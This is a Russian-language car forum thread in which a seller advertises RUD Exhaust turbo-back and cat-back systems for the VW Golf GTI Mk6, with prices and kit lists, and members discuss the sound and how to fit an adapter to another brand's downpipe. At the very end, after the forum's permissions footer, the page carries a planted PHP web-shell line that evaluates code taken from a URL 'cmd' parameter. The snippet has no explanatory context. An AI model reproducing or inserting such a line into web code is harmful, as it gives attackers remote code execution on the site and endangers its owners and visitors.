+ Ответить в теме
Страница 1 из 14 1 2 3 11 ... ПоследняяПоследняя
Показано с 1 по 10 из 138

Тема: Выхлопные системы RUD Exhaust


  1. #1
    GTI-Racing USSRxALeXeR is on a distinguished road Аватар для USSRxALeXeR
    Регистрация
    24.04.2012
    Откуда
    Донецк
    Машина
    RS FL
    Сообщений
    29

    Выхлопные системы RUD Exhaust

    Всем привет!
    Меня зовут Александр, и я представляю компанию RUD Exhaust!

    Готовы предложить для вашего VW Golf GTI MK6 Turbo-back на 3" трубе.

    Имеется две разновидности системы: выхлоп без катализаторов, а так же выхлоп со спортивным катализатором 100 cell.

    Цена выхлопной системы без катализаторов составляет - 1000$

    В комплекте:

    Даунпайп 3" из нерж.стали AISI-304
    Средняя часть 3" с овальным резонатором 150х220 из нержавеющей стали.
    Задняя часть 3". Два овальных глушителя из нержавеющей стали. Две полированные насадки резонаторного типа диаметром 100мм.
    Установочный комплект (метизы, прокладки)
    Весь выхлоп становится на автомобиль БОЛТ-ОН! Никаких допольнительных сварок и тп. не нужно!

    Цена выхлопной системы со спортивным катализатором - 1200$

    В комплекте:


    Даунпайп 3" из нерж.стали AISI-304 с спортивным катализатором (пропускная способность 100 CPSI )
    Средняя часть 3" с овальным резонатором 150х220 из нержавеющей стали.
    Задняя часть 3". Два овальных глушителя из нержавеющей стали. Две полированные насадки резонаторного типа диаметром 100мм.
    Установочный комплект (метизы, прокладки)
    Весь выхлоп становится на автомобиль БОЛТ-ОН! Никаких допольнительных сварок и тп. не нужно!

    Catback - 600$

    В комплекте:


    Переходник для соединения Catback системы со стоковым даунпайпом
    Средняя часть 3", резонатор овальный 150х220
    Задняя часть 3". Два полированных глушителя 125х260. Две полированные насадки диаметром 100мм резонаторного типа
    Установочный комплект (метизы, прокладки)

    Видео со звуком:


    Один из владельцев данной системы на GTI-club.ru - Dr1v3r

    В виде привилегий для GTI-club.ru осуществляется бесплатная доставка EMS почтой в Ваш город.
    Доставка осуществляется в течении 2-3х недель с момента заказа!


    Для получения этих привилегий прошу писать мне посредством системы личных сообщений на этом форуме!

  2. #2
    GTI-Racing Dr1v3r is on a distinguished road Аватар для Dr1v3r
    Регистрация
    31.12.2011
    Откуда
    Николаев, Украина
    Машина
    Golf GTI mk6
    Сообщений
    48
    Во всем это есть одно но. Видео действительно мое, но у меня выхлоп тиховат потому что я езжу с одной огромной банкой (в представленном варианте их две, поменьше). Поэтому, я так думаю, то что в серии - должно звучать сочнее! А в остальном - я доволен. Приятный звук, ничем не докучает, сильно наваливает под давкой в районе 2500-3000 об/мин, потом плавно переходит в благородный рык!) Есессна видео ничего не передает =(
    GTI mk6 m/t candy white
    RUD Exhaust 3" Turbo-back | APR Carbonio intake | S3 intercooler | APR Stage 2

  3. #3
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846
    Система выглядит очень качественно!

    А если у меня downpipe от Ultimate Racing:

    http://www.ultimate-racing.com/Produ...Downpipe.shtml

    Могу ли я через вот такой переходник (нижний на фото) соединить его с вашим cat-back?



    Добавлено через 1 минуту
    П.С. - он также 3 дюйма
    Последний раз редактировалось valj; 04.02.2013 в 11:00. Причина: Добавлено сообщение

  4. #4
    GTI-Racing USSRxALeXeR is on a distinguished road Аватар для USSRxALeXeR
    Регистрация
    24.04.2012
    Откуда
    Донецк
    Машина
    RS FL
    Сообщений
    29
    Цитата Сообщение от valj Посмотреть сообщение
    Система выглядит очень качественно!

    А если у меня downpipe от Ultimate Racing:

    http://www.ultimate-racing.com/Produ...Downpipe.shtml

    Могу ли я через вот такой переходник (нижний на фото) соединить его с вашим cat-back?



    Добавлено через 1 минуту
    П.С. - он также 3 дюйма
    Спасибо! :)

    Что бы соединить Ваш даунпайп с таким переходником с нашим катбеком, нужно будет приварить фланец к нему и соединить болтами как вариант, либо просто приварить друг другу. Проблемы как таковой нет :)

  5. #5
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846
    Мне бы хотелось получить готовое "out of the box" решение, которое мне даст полноценное 3 дюймовое соединение, без заужений.

    У меня в два варианта выбора в данный момент:

    1) заказать кэтбек у фирмы производителя моего даунпайпа, докупив переходник, как на картинке снизу, которую я выложил в предыдущем сообщении

    2) если это возможно, согласовать с вами изготовление выхлопа/переходника, который позволит мне просто привинтить, ваш выхлоп к моему даунпайпу без доп изменений на месте

    Такой вариант возможен?

  6. #6
    Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Регистрация
    13.01.2009
    Откуда
    Moscow
    Машина
    GTI Overload
    Сообщений
    6,561
    думаю с длинной переходника удаленно не угадать
    кто занимается выхлопами у нас по месту все сделают без проблем
    Golf V GTI Overload почти сток...

  7. #7
    Кобрабля 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold Аватар для 2esco
    Регистрация
    27.12.2010
    Откуда
    Moscow
    Машина
    Candy
    Сообщений
    2,288
    Цитата Сообщение от Spaceman Посмотреть сообщение
    думаю с длинной переходника удаленно не угадать
    кто занимается выхлопами у нас по месту все сделают без проблем
    +1 согласен! очень много мороки будет с замерами...

    Valj, тебе в мск приварят без сужений, как тебе удобно будет, просто закажи переходник и все! тебе принципиально, чтоб именно производитель это делал?
    Провокатор^^

  8. #8
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846
    А сделать мне такой переходник смогут тут? я просто не хочу ничего резать и переваривать.

    По видео звук выхлопа звучит почти как сток, пользователь сказал,что у него компоновка другая. Очень бы хотелось хоть примерно понять, как этот будет звучать.

    По компоновке безумно похож на кэтбек Ultimate Racing

  9. #9
    GTI-Racing USSRxALeXeR is on a distinguished road Аватар для USSRxALeXeR
    Регистрация
    24.04.2012
    Откуда
    Донецк
    Машина
    RS FL
    Сообщений
    29
    Цитата Сообщение от valj Посмотреть сообщение
    Мне бы хотелось получить готовое "out of the box" решение, которое мне даст полноценное 3 дюймовое соединение, без заужений.

    У меня в два варианта выбора в данный момент:

    1) заказать кэтбек у фирмы производителя моего даунпайпа, докупив переходник, как на картинке снизу, которую я выложил в предыдущем сообщении

    2) если это возможно, согласовать с вами изготовление выхлопа/переходника, который позволит мне просто привинтить, ваш выхлоп к моему даунпайпу без доп изменений на месте

    Такой вариант возможен?
    Ну на самом деле без машины это проблема сделать точно болт-он. Куда проще вариант, приварить в Москве все что нужно для соединения и все. Как отметили ребята ниже.

  10. #10
    Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Регистрация
    13.01.2009
    Откуда
    Moscow
    Машина
    GTI Overload
    Сообщений
    6,561
    Цитата Сообщение от valj Посмотреть сообщение
    А сделать мне такой переходник смогут тут? я просто не хочу ничего резать и переваривать.

    По видео звук выхлопа звучит почти как сток, пользователь сказал,что у него компоновка другая. Очень бы хотелось хоть примерно понять, как этот будет звучать.

    По компоновке безумно похож на кэтбек Ultimate Racing
    Что резать и переваривать???
    это анрил соединить твой пайп с другим катбеком удаленно
    в любом случае тебе тут сделают нормально все, хоть на v-band, хоть на фланце, хоть труба в трубу на хомуте, а можно и просто сварить, останется соединение только у входа в банки и резонатора
    не вижу вообще тут никакой проблемы
    Golf V GTI Overload почти сток...

+ Ответить в теме
Страница 1 из 14 1 2 3 11 ... ПоследняяПоследняя

Похожие темы

  1. Выхлопные системы 1.8T (+графики)
    от HAWK в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 21
    Последнее сообщение: 10.11.2023, 10:50
  2. Выхлопные системы Golf GTI Mk.7
    от Atomic-Moscow в разделе Golf 7
    Ответов: 3
    Последнее сообщение: 02.10.2023, 15:19
  3. Выхлопные системы и глушители BORLA
    от diza-flint в разделе Тюнинг
    Ответов: 1
    Последнее сообщение: 21.07.2015, 16:49
  4. Выхлопные системы Invidia для Golf V
    от Atomic-Moscow в разделе Тюнинг
    Ответов: 10
    Последнее сообщение: 17.11.2013, 14:05

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}